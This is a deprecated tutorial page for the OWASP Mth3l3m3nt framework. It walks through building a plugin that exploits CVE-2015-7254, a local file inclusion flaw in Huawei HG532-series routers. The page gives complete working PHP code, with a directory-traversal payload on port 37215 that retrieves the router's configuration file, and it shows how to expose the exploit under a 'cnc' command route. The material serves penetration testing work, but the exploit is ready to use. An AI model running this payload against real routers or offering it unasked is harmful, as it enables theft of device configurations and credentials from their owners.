Developing LFI Plugins (Exploits) Deprecated
#Developing LFI Plugins
Assuming you want to develop your new attack either an LFI (Local File Inclusion) or RFI (Remote File Inclusion). This has been made very easy with the Local And Remote File Inclusion "Larfi" class within the OWASP Mth3l3m3nt Framework Project.
For Purposes of this Instance we will develop and LFI plugin for CVE-2015-7254 That Affects Huawei Routers. It Affects the following series: Huawei HG532e, HG532n, and HG532.
##Developing CVE-2015-7254 Exploit
In order to develop an exploit we need to include it in our https://github.com/alienwithin/OWASP-mth3l3m3nt-framework/blob/master/framework/controller/lfiplugins.php file where it will be invoked from.
The steps to take in developing the exploit will be :
- Create a function to hold the plugin
- Initialize an Instance of the LARFI class
- Define which type of LFI exploit to add currently supports cookie based via POST or URI Based via GET.
- Define Parameters for the type of LFI exploit to run.
- Add a Navigation Menu to find it in the interface.
To do this we create an function that will hold it. We can call ours "huawei_lfi" This function will also need to use items from our base framework , It will therefore receive an instance of the same i.e. \Base $f3 meaning our Base Class can be accessed using the $f3 object in order to access the HIVE which is a memory array to hold your framework variables in the form of key / value pairs. Storing a value in the hive ensures it is globaly available to all classes and methods in your application . To read more about the HIVE http://fatfreeframework.com/base#TheHive
public function huawei_lfi(\Base $f3){
/*
Code will come here
*/
}We also need to create a new instance of the LARFI class so that we can use its functions in creating our exploit. To do this we define the new instance in our function , an example is shown below. What this means is with the variable $lfi we can access the functions within the LARFI class.
$lfi=new Larfi();Next we need to define a title for our exploit to be able to distinguish it from others when performing attacks. Ours for this case will be : HUAWEI LFI (cve-2015-7254) Huawei HG532e, HG532n, & HG532s
$f3->set('exploit_title', 'HUAWEI LFI (cve-2015-7254) Huawei HG532e, HG532n, & HG532s'); We use $f3 above because this element exploit_title is set in the HIVE for our View. Additionally we need to give the interface a template, For LFI we can use the constant right now that has been developed.
$this->response->data['SUBPART'] = 'lfi_page.html';After this we are ready to write our exploit.
Based on the documentation of the exploit it can be exploited via the URI. We will therefore use the uri_based_lfi function that takes 3 parameters .
- $blankurl => Used to check the condition of whether the URI is blank i.e. submitted without a value.
- $url => Holds the value of the actual URL to be attacked
- $payload => Holds the attack String to be appended to the URI and send
Once this is done we need the function to return a value i.e. whether successful or not, so for this we do a return of the uri_based _lfi exploit with our parameters. In our case let the exploit attempt to download the configuration file.
$blankurl=$f3->devoid('POST.url');
$url=$f3->get('POST.url');
$payload=":37215/icon/../../../etc/defaultcfg.xml";
return $this->uri_based_lfi($blankurl,$url,$payload);by now we already have a working interface for the exploit. Your function should be similar to below:
public function huawei_lfi(\Base $f3){
$lfi=new Larfi();
$f3->set('exploit_title', 'HUAWEI LFI (cve-2015-7254) Huawei HG532e, HG532n, & HG532s');
$this->response->data['SUBPART'] = 'lfi_page.html';
$blankurl=$f3->devoid('POST.url');
$url=$f3->get('POST.url');
$payload=":37215/icon/../../../etc/defaultcfg.xml";
return $this->uri_based_lfi($blankurl,$url,$payload);
}Assuming your application is hosted on http://attacker.google.com/mth, you can already access and use your function from :
http://attacker.google.com/mth/cnc/lfi/huawei_lfiHowever its good to officialize it in the interface so that you don't have to remember the URI. We will add this to the LARFI layout so that it has a navigation menu as below:
<a href="cnc/lfi/huawei_lfi" class="list-group-item{{(@PARAMS.0=='cnc/lfi/huawei_lfi'||@PARAMS.0=='/cnc/lfi/huawei_lfi'?' active':'') }}">Huawei LFI</a>That's it you're done. If successful you should get the interface as below:
